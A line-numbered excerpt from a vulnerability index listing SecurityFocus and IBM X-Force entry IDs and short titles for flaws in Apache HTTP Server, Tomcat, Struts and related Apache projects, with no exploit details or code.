4478| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
4479| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
4480| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
4481| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
4482| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
4483| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
4484| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
4485| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
4486| [6117] Apache mod_php File Descriptor Leakage Vulnerability
4487| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
4488| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
4489| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
4490| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
4491| [5992] Apache HTDigest Insecure Temporary File Vulnerability
4492| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
4493| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
4494| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
4495| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
4496| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
4497| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
4498| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
4499| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
4500| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
4501| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
4502| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
4503| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
4504| [5485] Apache 2.0 Path Disclosure Vulnerability
4505| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
4506| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
4507| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
4508| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
4509| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
4510| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
4511| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
4512| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
4513| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
4514| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
4515| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
4516| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
4517| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
4518| [4437] Apache Error Message Cross-Site Scripting Vulnerability
4519| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
4520| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
4521| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
4522| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
4523| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
4524| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
4525| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
4526| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
4527| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
4528| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
4529| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
4530| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
4531| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
4532| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
4533| [3596] Apache Split-Logfile File Append Vulnerability
4534| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
4535| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
4536| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
4537| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
4538| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
4539| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
4540| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
4541| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
4542| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
4543| [3169] Apache Server Address Disclosure Vulnerability
4544| [3009] Apache Possible Directory Index Disclosure Vulnerability
4545| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
4546| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
4547| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
4548| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
4549| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
4550| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
4551| [2216] Apache Web Server DoS Vulnerability
4552| [2182] Apache /tmp File Race Vulnerability
4553| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
4554| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
4555| [1821] Apache mod_cookies Buffer Overflow Vulnerability
4556| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
4557| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
4558| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
4559| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
4560| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
4561| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
4562| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
4563| [1457] Apache::ASP source.asp Example Script Vulnerability
4564| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
4565| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
4566|
4567| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4568| [86258] Apache CloudStack text fields cross-site scripting
4569| [85983] Apache Subversion mod_dav_svn module denial of service
4570| [85875] Apache OFBiz UEL code execution
4571| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
4572| [85871] Apache HTTP Server mod_session_dbd unspecified
4573| [85756] Apache Struts OGNL expression command execution
4574| [85755] Apache Struts DefaultActionMapper class open redirect
4575| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
4576| [85574] Apache HTTP Server mod_dav denial of service
4577| [85573] Apache Struts Showcase App OGNL code execution
4578| [85496] Apache CXF denial of service
4579| [85423] Apache Geronimo RMI classloader code execution
4580| [85326] Apache Santuario XML Security for C++ buffer overflow
4581| [85323] Apache Santuario XML Security for Java spoofing
4582| [85319] Apache Qpid Python client SSL spoofing
4583| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
4584| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
4585| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
4586| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
4587| [84952] Apache Tomcat CVE-2012-3544 denial of service
4588| [84763] Apache Struts CVE-2013-2135 security bypass
4589| [84762] Apache Struts CVE-2013-2134 security bypass
4590| [84719] Apache Subversion CVE-2013-2088 command execution
4591| [84718] Apache Subversion CVE-2013-2112 denial of service
4592| [84717] Apache Subversion CVE-2013-1968 denial of service
4593| [84577] Apache Tomcat security bypass
4594| [84576] Apache Tomcat symlink
4595| [84543] Apache Struts CVE-2013-2115 security bypass
4596| [84542] Apache Struts CVE-2013-1966 security bypass
4597| [84154] Apache Tomcat session hijacking
4598| [84144] Apache Tomcat denial of service
4599| [84143] Apache Tomcat information disclosure
4600| [84111] Apache HTTP Server command execution
4601| [84043] Apache Virtual Computing Lab cross-site scripting
4602| [84042] Apache Virtual Computing Lab cross-site scripting
4603| [83782] Apache CloudStack information disclosure
4604| [83781] Apache CloudStack security bypass
4605| [83720] Apache ActiveMQ cross-site scripting
4606| [83719] Apache ActiveMQ denial of service
4607| [83718] Apache ActiveMQ denial of service
4608| [83263] Apache Subversion denial of service
4609| [83262] Apache Subversion denial of service
4610| [83261] Apache Subversion denial of service
4611| [83259] Apache Subversion denial of service
4612| [83035] Apache mod_ruid2 security bypass
4613| [82852] Apache Qpid federation_tag security bypass
4614| [82851] Apache Qpid qpid::framing::Buffer denial of service
4615| [82758] Apache Rave User RPC API information disclosure
4616| [82663] Apache Subversion svn_fs_file_length() denial of service
4617| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
4618| [82641] Apache Qpid AMQP denial of service
4619| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
4620| [82618] Apache Commons FileUpload symlink
4621| [82360] Apache HTTP Server manager interface cross-site scripting
4622| [82359] Apache HTTP Server hostnames cross-site scripting
4623| [82338] Apache Tomcat log/logdir information disclosure
4624| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
4625| [82268] Apache OpenJPA deserialization command execution
4626| [81981] Apache CXF UsernameTokens security bypass
4627| [81980] Apache CXF WS-Security security bypass
4628| [81398] Apache OFBiz cross-site scripting
4629| [81240] Apache CouchDB directory traversal
4630| [81226] Apache CouchDB JSONP code execution
4631| [81225] Apache CouchDB Futon user interface cross-site scripting
4632| [81211] Apache Axis2/C SSL spoofing
4633| [81167] Apache CloudStack DeployVM information disclosure
4634| [81166] Apache CloudStack AddHost API information disclosure
4635| [81165] Apache CloudStack createSSHKeyPair API information disclosure
4636| [80518] Apache Tomcat cross-site request forgery security bypass
4637| [80517] Apache Tomcat FormAuthenticator security bypass
4638| [80516] Apache Tomcat NIO denial of service
4639| [80408] Apache Tomcat replay-countermeasure security bypass
4640| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
4641| [80317] Apache Tomcat slowloris denial of service
4642| [79984] Apache Commons HttpClient SSL spoofing
4643| [79983] Apache CXF SSL spoofing
4644| [79830] Apache Axis2/Java SSL spoofing
4645| [79829] Apache Axis SSL spoofing
4646| [79809] Apache Tomcat DIGEST security bypass
4647| [79806] Apache Tomcat parseHeaders() denial of service
4648| [79540] Apache OFBiz unspecified
4649| [79487] Apache Axis2 SAML security bypass
4650| [79212] Apache Cloudstack code execution
4651| [78734] Apache CXF SOAP Action security bypass
4652| [78730] Apache Qpid broker denial of service
4653| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
4654| [78563] Apache mod_pagespeed module unspecified cross-site scripting
4655| [78562] Apache mod_pagespeed module security bypass
4656| [78454] Apache Axis2 security bypass
4657| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
4658| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
4659| [78321] Apache Wicket unspecified cross-site scripting
4660| [78183] Apache Struts parameters denial of service
4661| [78182] Apache Struts cross-site request forgery
4662| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
4663| [77987] mod_rpaf module for Apache denial of service
4664| [77958] Apache Struts skill name code execution
4665| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
4666| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
4667| [77568] Apache Qpid broker security bypass
4668| [77421] Apache Libcloud spoofing
4669| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
4670| [77046] Oracle Solaris Apache HTTP Server information disclosure
4671| [76837] Apache Hadoop information disclosure
4672| [76802] Apache Sling CopyFrom denial of service
4673| [76692] Apache Hadoop symlink
4674| [76535] Apache Roller console cross-site request forgery
4675| [76534] Apache Roller weblog cross-site scripting
4676| [76152] Apache CXF elements security bypass
4677| [76151] Apache CXF child policies security bypass
4678| [75983] MapServer for Windows Apache file include
4679| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
4680| [75558] Apache POI denial of service
4681| [75545] PHP apache_request_headers() buffer overflow
4682| [75302] Apache Qpid SASL security bypass
4683| [75211] Debian GNU/Linux apache 2 cross-site scripting
4684| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
4685| [74871] Apache OFBiz FlexibleStringExpander code execution
4686| [74870] Apache OFBiz multiple cross-site scripting
4687| [74750] Apache Hadoop unspecified spoofing
4688| [74319] Apache Struts XSLTResult.java file upload
4689| [74313] Apache Traffic Server header buffer overflow
4690| [74276] Apache Wicket directory traversal
4691| [74273] Apache Wicket unspecified cross-site scripting
4692| [74181] Apache HTTP Server mod_fcgid module denial of service
4693| [73690] Apache Struts OGNL code execution
4694| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
4695| [73100] Apache MyFaces in directory traversal
4696| [73096] Apache APR hash denial of service
4697| [73052] Apache Struts name cross-site scripting
4698| [73030] Apache CXF UsernameToken security bypass
4699| [72888] Apache Struts lastName cross-site scripting
4700| [72758] Apache HTTP Server httpOnly information disclosure
4701| [72757] Apache HTTP Server MPM denial of service
4702| [72585] Apache Struts ParameterInterceptor security bypass
4703| [72438] Apache Tomcat Digest security bypass
4704| [72437] Apache Tomcat Digest security bypass
4705| [72436] Apache Tomcat DIGEST security bypass
4706| [72425] Apache Tomcat parameter denial of service
4707| [72422] Apache Tomcat request object information disclosure
4708| [72377] Apache HTTP Server scoreboard security bypass
4709| [72345] Apache HTTP Server HTTP request denial of service
4710| [72229] Apache Struts ExceptionDelegator command execution
4711| [72089] Apache Struts ParameterInterceptor directory traversal
4712| [72088] Apache Struts CookieInterceptor command execution
4713| [72047] Apache Geronimo hash denial of service
4714| [72016] Apache Tomcat hash denial of service
4715| [71711] Apache Struts OGNL expression code execution
4716| [71654] Apache Struts interfaces security bypass
4717| [71620] Apache ActiveMQ failover denial of service
4718| [71617] Apache HTTP Server mod_proxy module information disclosure
4719| [71508] Apache MyFaces EL security bypass
4720| [71445] Apache HTTP Server mod_proxy security bypass
4721| [71203] Apache Tomcat servlets privilege escalation
4722| [71181] Apache HTTP Server ap_pregsub() denial of service
4723| [71093] Apache HTTP Server ap_pregsub() buffer overflow
4724| [70336] Apache HTTP Server mod_proxy information disclosure
4725| [69804] Apache HTTP Server mod_proxy_ajp denial of service
4726| [69472] Apache Tomcat AJP security bypass
4727| [69396] Apache HTTP Server ByteRange filter denial of service
4728| [69394] Apache Wicket multi window support cross-site scripting
4729| [69176] Apache Tomcat XML information disclosure
4730| [69161] Apache Tomcat jsvc information disclosure
4731| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
4732| [68541] Apache Tomcat sendfile information disclosure
4733| [68420] Apache XML Security denial of service
4734| [68238] Apache Tomcat JMX information disclosure
4735| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
4736| [67804] Apache Subversion control rules information disclosure
4737| [67803] Apache Subversion control rules denial of service
4738| [67802] Apache Subversion baselined denial of service
4739| [67672] Apache Archiva multiple cross-site scripting
4740| [67671] Apache Archiva multiple cross-site request forgery
4741| [67564] Apache APR apr_fnmatch() denial of service
4742| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
4743| [67515] Apache Tomcat annotations security bypass
4744| [67480] Apache Struts s:submit information disclosure
4745| [67414] Apache APR apr_fnmatch() denial of service
4746| [67356] Apache Struts javatemplates cross-site scripting
4747| [67354] Apache Struts Xwork cross-site scripting
4748| [66676] Apache Tomcat HTTP BIO information disclosure
4749| [66675] Apache Tomcat web.xml security bypass
4750| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
4751| [66241] Apache HttpComponents information disclosure
4752| [66154] Apache Tomcat ServletSecurity security bypass
4753| [65971] Apache Tomcat ServletSecurity security bypass
4754| [65876] Apache Subversion mod_dav_svn denial of service
4755| [65343] Apache Continuum unspecified cross-site scripting
4756| [65162] Apache Tomcat NIO connector denial of service
4757| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
4758| [65160] Apache Tomcat HTML Manager interface cross-site scripting
4759| [65159] Apache Tomcat ServletContect security bypass
4760| [65050] Apache CouchDB web-based administration UI cross-site scripting
4761| [64773] Oracle HTTP Server Apache Plugin unauthorized access
4762| [64473] Apache Subversion blame -g denial of service
4763| [64472] Apache Subversion walk() denial of service
4764| [64407] Apache Axis2 CVE-2010-0219 code execution
4765| [63926] Apache Archiva password privilege escalation
4766| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
4767| [63493] Apache Archiva credentials cross-site request forgery
4768| [63477] Apache Tomcat HttpOnly session hijacking
4769| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
4770| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
4771| [62959] Apache Shiro filters security bypass
4772| [62790] Apache Perl cgi module denial of service
4773| [62576] Apache Qpid exchange denial of service
4774| [62575] Apache Qpid AMQP denial of service
4775| [62354] Apache Qpid SSL denial of service
4776| [62235] Apache APR-util apr_brigade_split_line() denial of service
4777| [62181] Apache XML-RPC SAX Parser information disclosure
4778| [61721] Apache Traffic Server cache poisoning
4779| [61202] Apache Derby BUILTIN authentication functionality information disclosure
4780| [61186] Apache CouchDB Futon cross-site request forgery
4781| [61169] Apache CXF DTD denial of service
4782| [61070] Apache Jackrabbit search.jsp SQL injection
4783| [61006] Apache SLMS Quoting cross-site request forgery
4784| [60962] Apache Tomcat time cross-site scripting
4785| [60883] Apache mod_proxy_http information disclosure
4786| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
4787| [60264] Apache Tomcat Transfer-Encoding denial of service
4788| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
4789| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
4790| [59413] Apache mod_proxy_http timeout information disclosure
4791| [59058] Apache MyFaces unencrypted view state cross-site scripting
4792| [58827] Apache Axis2 xsd file include
4793| [58790] Apache Axis2 modules cross-site scripting
4794| [58299] Apache ActiveMQ queueBrowse cross-site scripting
4795| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
4796| [58056] Apache ActiveMQ .jsp source code disclosure
4797| [58055] Apache Tomcat realm name information disclosure
4798| [58046] Apache HTTP Server mod_auth_shadow security bypass
4799| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
4800| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
4801| [57429] Apache CouchDB algorithms information disclosure
4802| [57398] Apache ActiveMQ Web console cross-site request forgery
4803| [57397] Apache ActiveMQ createDestination.action cross-site scripting
4804| [56653] Apache HTTP Server DNS spoofing
4805| [56652] Apache HTTP Server DNS cross-site scripting
4806| [56625] Apache HTTP Server request header information disclosure
4807| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
4808| [56623] Apache HTTP Server mod_proxy_ajp denial of service
4809| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
4810| [55857] Apache Tomcat WAR files directory traversal
4811| [55856] Apache Tomcat autoDeploy attribute security bypass
4812| [55855] Apache Tomcat WAR directory traversal
4813| [55210] Intuit component for Joomla! Apache information disclosure
4814| [54533] Apache Tomcat 404 error page cross-site scripting
4815| [54182] Apache Tomcat admin default password
4816| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
4817| [53666] Apache HTTP Server Solaris pollset support denial of service
4818| [53650] Apache HTTP Server HTTP basic-auth module security bypass
4819| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
4820| [53041] mod_proxy_ftp module for Apache denial of service
4821| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
4822| [51953] Apache Tomcat Path Disclosure
4823| [51952] Apache Tomcat Path Traversal
4824| [51951] Apache stronghold-status Information Disclosure
4825| [51950] Apache stronghold-info Information Disclosure
4826| [51949] Apache PHP Source Code Disclosure
4827| [51948] Apache Multiviews Attack
4828| [51946] Apache JServ Environment Status Information Disclosure
4829| [51945] Apache error_log Information Disclosure
4830| [51944] Apache Default Installation Page Pattern Found
4831| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
4832| [51942] Apache AXIS XML External Entity File Retrieval
4833| [51941] Apache AXIS Sample Servlet Information Leak
4834| [51940] Apache access_log Information Disclosure
4835| [51626] Apache mod_deflate denial of service
4836| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
4837| [51365] Apache Tomcat RequestDispatcher security bypass
4838| [51273] Apache HTTP Server Incomplete Request denial of service
4839| [51195] Apache Tomcat XML information disclosure
4840| [50994] Apache APR-util xml/apr_xml.c denial of service
4841| [50993] Apache APR-util apr_brigade_vprintf denial of service
4842| [50964] Apache APR-util apr_strmatch_precompile() denial of service
4843| [50930] Apache Tomcat j_security_check information disclosure
4844| [50928] Apache Tomcat AJP denial of service
4845| [50884] Apache HTTP Server XML ENTITY denial of service
4846| [50808] Apache HTTP Server AllowOverride privilege escalation
4847| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
4848| [50059] Apache mod_proxy_ajp information disclosure
4849| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
4850| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
4851| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
4852| [49921] Apache ActiveMQ Web interface cross-site scripting
4853| [49898] Apache Geronimo Services/Repository directory traversal
4854| [49725] Apache Tomcat mod_jk module information disclosure
4855| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
4856| [49712] Apache Struts unspecified cross-site scripting
4857| [49213] Apache Tomcat cal2.jsp cross-site scripting
4858| [48934] Apache Tomcat POST doRead method information disclosure
4859| [48211] Apache Tomcat header HTTP request smuggling
4860| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
4861| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
4862| [47709] Apache Roller "
4863| [47104] Novell Netware ApacheAdmin console security bypass
4864| [47086] Apache HTTP Server OS fingerprinting unspecified
4865| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
4866| [45791] Apache Tomcat RemoteFilterValve security bypass
4867| [44435] Oracle WebLogic Apache Connector buffer overflow
4868| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
4869| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
4870| [44156] Apache Tomcat RequestDispatcher directory traversal
4871| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
4872| [43885] Oracle WebLogic Server Apache Connector buffer overflow
4873| [42987] Apache HTTP Server mod_proxy module denial of service
4874| [42915] Apache Tomcat JSP files path disclosure
4875| [42914] Apache Tomcat MS-DOS path disclosure
4876| [42892] Apache Tomcat unspecified unauthorized access
4877| [42816] Apache Tomcat Host Manager cross-site scripting
4878| [42303] Apache 403 error cross-site scripting
4879| [41618] Apache-SSL ExpandCert() authentication bypass
4880| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
4881| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
4882| [40614] Apache mod_jk2 HTTP Host header buffer overflow
4883| [40562] Apache Geronimo init information disclosure
4884| [40478] Novell Web Manager webadmin-apache.conf security bypass
4885| [40411] Apache Tomcat exception handling information disclosure
4886| [40409] Apache Tomcat native (APR based) connector weak security
4887| [40403] Apache Tomcat quotes and %5C cookie information disclosure
4888| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
4889| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
4890| [39867] Apache HTTP Server mod_negotiation cross-site scripting
4891| [39804] Apache Tomcat SingleSignOn information disclosure
4892| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
4893| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
4894| [39608] Apache HTTP Server balancer manager cross-site request forgery
4895| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
4896| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
4897| [39472] Apache HTTP Server mod_status cross-site scripting
4898| [39201] Apache Tomcat JULI logging weak security
4899| [39158] Apache HTTP Server Windows SMB shares information disclosure
4900| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
4901| [38951] Apache::AuthCAS Perl module cookie SQL injection
4902| [38800] Apache HTTP Server 413 error page cross-site scripting
4903| [38211] Apache Geronimo SQLLoginModule authentication bypass
4904| [37243] Apache Tomcat WebDAV directory traversal
4905| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
4906| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
4907| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
4908| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
4909| [36782] Apache Geronimo MEJB unauthorized access
4910| [36586] Apache HTTP Server UTF-7 cross-site scripting
4911| [36468] Apache Geronimo LoginModule security bypass
4912| [36467] Apache Tomcat functions.jsp cross-site scripting
4913| [36402] Apache Tomcat calendar cross-site request forgery
4914| [36354] Apache HTTP Server mod_proxy module denial of service
4915| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
4916| [36336] Apache Derby lock table privilege escalation
4917| [36335] Apache Derby schema privilege escalation
4918| [36006] Apache Tomcat "
4919| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
4920| [35999] Apache Tomcat \"
4921| [35795] Apache Tomcat CookieExample cross-site scripting
4922| [35536] Apache Tomcat SendMailServlet example cross-site scripting
4923| [35384] Apache HTTP Server mod_cache module denial of service
4924| [35097] Apache HTTP Server mod_status module cross-site scripting
4925| [35095] Apache HTTP Server Prefork MPM module denial of service
4926| [34984] Apache HTTP Server recall_headers information disclosure
4927| [34966] Apache HTTP Server MPM content spoofing
4928| [34965] Apache HTTP Server MPM information disclosure
4929| [34963] Apache HTTP Server MPM multiple denial of service
4930| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
4931| [34869] Apache Tomcat JSP example Web application cross-site scripting
4932| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
4933| [34496] Apache Tomcat JK Connector security bypass
4934| [34377] Apache Tomcat hello.jsp cross-site scripting
4935| [34212] Apache Tomcat SSL configuration security bypass
4936| [34210] Apache Tomcat Accept-Language cross-site scripting
4937| [34209] Apache Tomcat calendar application cross-site scripting
4938| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
4939| [34167] Apache Axis WSDL file path disclosure
4940| [34068] Apache Tomcat AJP connector information disclosure
4941| [33584] Apache HTTP Server suEXEC privilege escalation
4942| [32988] Apache Tomcat proxy module directory traversal
4943| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
4944| [32708] Debian Apache tty privilege escalation
4945| [32441] ApacheStats extract() PHP call unspecified
4946| [32128] Apache Tomcat default account
4947| [31680] Apache Tomcat RequestParamExample cross-site scripting
4948| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
4949| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
4950| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
4951| [30456] Apache mod_auth_kerb off-by-one buffer overflow
4952| [29550] Apache mod_tcl set_var() format string
4953| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
4954| [28357] Apache HTTP Server mod_alias script source information disclosure
4955| [28063] Apache mod_rewrite off-by-one buffer overflow
4956| [27902] Apache Tomcat URL information disclosure
4957| [26786] Apache James SMTP server denial of service
4958| [25680] libapache2 /tmp/svn file upload
4959| [25614] Apache Struts lookupMap cross-site scripting
4960| [25613] Apache Struts ActionForm denial of service
4961| [25612] Apache Struts isCancelled() security bypass
4962| [24965] Apache mod_python FileSession command execution
4963| [24716] Apache James spooler memory leak denial of service
4964| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
4965| [24158] Apache Geronimo jsp-examples cross-site scripting
4966| [24030] Apache auth_ldap module multiple format strings
4967| [24008] Apache mod_ssl custom error message denial of service
4968| [24003] Apache mod_auth_pgsql module multiple syslog format strings
4969| [23612] Apache mod_imap referer field cross-site scripting
4970| [23173] Apache Struts error message cross-site scripting
4971| [22942] Apache Tomcat directory listing denial of service
4972| [22858] Apache Multi-Processing Module code allows denial of service
4973| [22602] RHSA-2005:582 updates for Apache httpd not installed
4974| [22520] Apache mod-auth-shadow "
4975| [22466] ApacheTop symlink
4976| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
4977| [22006] Apache HTTP Server byte-range filter denial of service
4978| [21567] Apache mod_ssl off-by-one buffer overflow
4979| [21195] Apache HTTP Server header HTTP request smuggling
4980| [20383] Apache HTTP Server htdigest buffer overflow
4981| [19681] Apache Tomcat AJP12 request denial of service
4982| [18993] Apache HTTP server check_forensic symlink attack
4983| [18790] Apache Tomcat Manager cross-site scripting
4984| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
4985| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
4986| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
4987| [17961] Apache Web server ServerTokens has not been set
4988| [17930] Apache HTTP Server HTTP GET request denial of service
4989| [17785] Apache mod_include module buffer overflow
4990| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
4991| [17473] Apache HTTP Server Satisfy directive allows access to resources
4992| [17413] Apache htpasswd buffer overflow
4993| [17384] Apache HTTP Server environment variable configuration file buffer overflow
4994| [17382] Apache HTTP Server IPv6 apr_util denial of service
4995| [17366] Apache HTTP Server mod_dav module LOCK denial of service
4996| [17273] Apache HTTP Server speculative mode denial of service
4997| [17200] Apache HTTP Server mod_ssl denial of service
4998| [16890] Apache HTTP Server server-info request has been detected
4999| [16889] Apache HTTP Server server-status request has been detected
